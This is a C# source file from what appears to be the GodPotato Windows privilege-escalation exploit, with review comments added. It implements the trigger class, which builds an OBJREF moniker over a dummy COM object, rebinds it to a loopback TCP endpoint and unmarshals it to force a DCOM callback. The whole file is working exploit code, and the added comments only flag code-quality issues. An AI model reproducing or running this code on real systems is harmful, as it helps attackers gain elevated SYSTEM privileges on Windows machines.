GodPotatoUnmarshalTrigger.cs
using System;
using System.Runtime.InteropServices;
using System.Runtime.InteropServices.ComTypes;
namespace GodPotato.NativeAPI{
/// <summary>
/// Builds a marshaled OBJREF for a throw-away CLR object and hands a rewritten copy of it to
/// <c>UnmarshalDCOM.UnmarshalObject</c>. The constructor wraps <see cref="fakeObject"/> as an
/// IUnknown and creates an OBJREF moniker over it; <see cref="Trigger"/> reads the moniker's
/// display name back, copies the OXID/OID/IPID of the decoded OBJREF into a new OBJREF whose
/// string binding points at <c>127.0.0.1</c> over <c>towerProtocol</c>, and unmarshals that.
/// </summary>
/// <remarks>
/// Review notes on this class as written: the IUnknown pointer obtained in the constructor is
/// never released (no <c>Marshal.Release</c> anywhere in the class); the results of
/// <c>NativeMethods.CreateBindCtx</c> / <c>NativeMethods.CreateObjrefMoniker</c> are not checked,
/// so a failure there would presumably surface later as a null <c>moniker</c>/<c>bindCtx</c> in
/// <see cref="Trigger"/>; and the <c>ppv</c> produced by <c>UnmarshalObject</c> is discarded
/// without being used or released.
/// </remarks>
// Marked COM-visible. Note the IUnknown handed out below wraps fakeObject, not this instance.
[ComVisible(true)]
public class GodPotatoUnmarshalTrigger {
// Well-known IID of IUnknown; used as the interface id of the rebuilt OBJREF in Trigger().
private readonly static Guid IID_IUnknown = new Guid("{00000000-0000-0000-C000-000000000046}");
// Host written into the rebuilt OBJREF's string binding (loopback only).
private readonly static string binding = "127.0.0.1";
// Protocol sequence for the rebuilt string binding; TowerProtocol is a project-defined enum.
private readonly static TowerProtocol towerProtocol = TowerProtocol.EPM_PROTOCOL_TCP;
// Plain CLR object that the constructor exposes to COM as an IUnknown.
public object fakeObject = new object();
// Raw IUnknown pointer for fakeObject (Marshal.GetIUnknownForObject). Never released in this class.
public IntPtr pIUnknown;
// Bind context passed to IMoniker.GetDisplayName in Trigger().
public IBindCtx bindCtx;
// OBJREF moniker created over pIUnknown in the constructor.
public IMoniker moniker;
// Owning context; supplies ConsoleWriter and must report IsStart before this class is usable.
private GodPotatoContext godPotatoContext;
/// <summary>
/// Stores the context, then creates the IUnknown for <see cref="fakeObject"/>, a bind context,
/// and an OBJREF moniker over that IUnknown.
/// </summary>
/// <param name="godPotatoContext">Context whose <c>ConsoleWriter</c> receives the log lines; must have <c>IsStart == true</c>.</param>
/// <exception cref="Exception">Thrown when <paramref name="godPotatoContext"/> is not started.</exception>
public GodPotatoUnmarshalTrigger(GodPotatoContext godPotatoContext) {
this.godPotatoContext = godPotatoContext;
if (!godPotatoContext.IsStart)
{
// Review: a specific InvalidOperationException would be the conventional choice here.
throw new Exception("GodPotatoContext was not initialized");
}
// Expose the CLR object as an IUnknown so an OBJREF moniker can be built over it.
pIUnknown = Marshal.GetIUnknownForObject(fakeObject);
// Review: neither native call's result (HRESULT or otherwise) is checked; on failure
// bindCtx/moniker would presumably remain null and Trigger() would throw.
NativeMethods.CreateBindCtx(0, out bindCtx);
NativeMethods.CreateObjrefMoniker(pIUnknown, out moniker);
}
/// <summary>
/// Reads the OBJREF moniker's display name, decodes the OBJREF it carries and logs its fields,
/// then rebuilds an OBJREF with the same OXID/OID/IPID but a single TCP string binding to
/// <c>127.0.0.1</c> and passes the resulting bytes to <c>UnmarshalDCOM.UnmarshalObject</c>.
/// </summary>
/// <returns>
/// Whatever <c>UnmarshalDCOM.UnmarshalObject</c> returns (presumably an HRESULT — confirm in
/// UnmarshalDCOM); the unmarshaled pointer itself is discarded.
/// </returns>
public int Trigger() {
string ppszDisplayName;
moniker.GetDisplayName(bindCtx, null, out ppszDisplayName);
// The code assumes the display name is base64 wrapped as "objref:...:"; the two Replace
// calls strip the prefix and every remaining ':' so the rest can be base64-decoded.
ppszDisplayName = ppszDisplayName.Replace("objref:", "").Replace(":", "");
byte[] objrefBytes = Convert.FromBase64String(ppszDisplayName);
// Decode the original OBJREF (project type) so its identifiers can be reused below.
ObjRef tmpObjRef = new ObjRef(objrefBytes);
// Log the decoded standard-OBJREF fields to the context's writer.
godPotatoContext.ConsoleWriter.WriteLine($"[*] DCOM obj GUID: {tmpObjRef.Guid}");
godPotatoContext.ConsoleWriter.WriteLine($"[*] DCOM obj IPID: {tmpObjRef.StandardObjRef.IPID}");
godPotatoContext.ConsoleWriter.WriteLine("[*] DCOM obj OXID: 0x{0:x}", tmpObjRef.StandardObjRef.OXID);
godPotatoContext.ConsoleWriter.WriteLine("[*] DCOM obj OID: 0x{0:x}", tmpObjRef.StandardObjRef.OID);
godPotatoContext.ConsoleWriter.WriteLine("[*] DCOM obj Flags: 0x{0:x}", tmpObjRef.StandardObjRef.Flags);
godPotatoContext.ConsoleWriter.WriteLine("[*] DCOM obj PublicRefs: 0x{0:x}", tmpObjRef.StandardObjRef.PublicRefs);
// Rebuild the OBJREF: IID_IUnknown, the original OXID/OID/IPID, one string binding
// (towerProtocol/binding) and one security binding. The leading (0, 1) of ObjRef.Standard and
// the (0xa, 0xffff, null) of ObjRef.SecurityBinding are positional; their meaning is defined by
// the project's ObjRef types — confirm there rather than here.
ObjRef objRef = new ObjRef(IID_IUnknown,
new ObjRef.Standard(0, 1, tmpObjRef.StandardObjRef.OXID, tmpObjRef.StandardObjRef.OID, tmpObjRef.StandardObjRef.IPID,
new ObjRef.DualStringArray(new ObjRef.StringBinding(towerProtocol, binding), new ObjRef.SecurityBinding(0xa, 0xffff, null))));
byte[] data = objRef.GetBytes();
godPotatoContext.ConsoleWriter.WriteLine($"[*] Marshal Object bytes len: {data.Length}");
// Review: ppv is received but never used or released after the call below.
IntPtr ppv;
// (The $ prefix is unnecessary here; the string has no placeholders.)
godPotatoContext.ConsoleWriter.WriteLine($"[*] UnMarshal Object");
return UnmarshalDCOM.UnmarshalObject(data,out ppv);
}
}
}